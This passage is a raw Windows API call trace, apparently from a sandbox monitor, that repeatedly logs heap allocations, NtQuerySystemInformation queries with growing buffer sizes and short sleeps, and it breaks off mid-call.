RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0154.464] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0154.465] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0154.465] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0154.466] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0154.466] Sleep (dwMilliseconds=0x110) [0154.865] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0154.865] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0154.866] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0154.866] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0154.867] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0154.867] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0154.867] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0154.868] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0154.868] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0154.868] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0154.869] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0154.869] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0154.869] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0154.870] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0154.870] Sleep (dwMilliseconds=0x110) [0155.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0155.252] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0155.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0155.253] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0155.254] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0155.254] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0155.255] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0155.257] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0155.258] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0155.258] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0155.258] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0155.259] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0155.259] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0155.261] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0155.261] Sleep (dwMilliseconds=0x110) [0155.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0155.611] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0155.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0155.612] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0155.613] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0155.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0155.613] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0155.614] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0155.614] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0155.615] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0155.616] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0155.616] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0155.617] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0155.617] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0155.617] Sleep (dwMilliseconds=0x110) [0156.063] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0156.063] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0156.065] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0156.065] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0156.066] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0156.066] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0156.067] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0156.067] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0156.067] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0156.068] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0156.069] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0156.069] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0156.069] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0156.070] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0156.070] Sleep (dwMilliseconds=0x110) [0156.359] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0156.359] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0156.360] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0156.361] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0156.361] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0156.361] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0156.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0156.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0156.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0156.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0156.363] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0156.364] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0156.364] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0156.365] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0156.365] Sleep (dwMilliseconds=0x110) [0156.700] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0156.700] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0156.701] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0156.702] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0156.702] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0156.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0156.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0156.704] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0156.704] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0156.704] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0156.705] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0156.705] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0156.706] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0156.707] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0156.707] Sleep (dwMilliseconds=0x110) [0157.147] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0157.147] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0157.147] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0157.148] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0157.148] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0157.149] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0157.149] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0157.149] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0157.150] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0157.150] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0157.150] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0157.151] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0157.151] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0157.152] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0157.152] Sleep (dwMilliseconds=0x110) [0157.449] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0157.449] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0157.450] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0157.451] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0157.451] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0157.451] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0157.452] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0157.452] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0157.452] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0157.454] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0157.454] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0157.455] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0157.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0157.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0157.456] Sleep (dwMilliseconds=0x110) [0157.796] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0157.796] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0157.797] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0157.797] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0157.797] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0157.798] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0157.798] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0157.798] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0157.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0157.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0157.800] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0157.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0157.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0157.806] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0157.808] Sleep (dwMilliseconds=0x110) [0158.139] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0158.139] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0158.139] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0158.140] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0158.140] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0158.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0158.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0158.141] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0158.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0158.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0158.143] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0158.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0158.144] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0158.145] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0158.145] Sleep (dwMilliseconds=0x110) [0158.506] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0158.506] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0158.506] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0158.507] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0158.507] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0158.508] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0158.508] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0158.513] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0158.515] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0158.515] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0158.516] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0158.516] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0158.517] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0158.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0158.518] Sleep (dwMilliseconds=0x110) [0158.807] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0158.807] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0158.808] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0158.808] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0158.809] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0158.809] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0158.809] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0158.810] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0158.810] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0158.810] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0158.810] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0158.811] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0158.811] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0158.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0158.812] Sleep (dwMilliseconds=0x110) [0159.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0159.331] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0159.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0159.332] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0159.332] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0159.333] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0159.333] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0159.333] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0159.334] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0159.334] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0159.334] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0159.335] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0159.335] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0159.336] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0159.336] Sleep (dwMilliseconds=0x110) [0159.803] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0159.822] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0159.823] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0159.824] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0159.824] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0159.825] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0159.825] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0159.825] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, 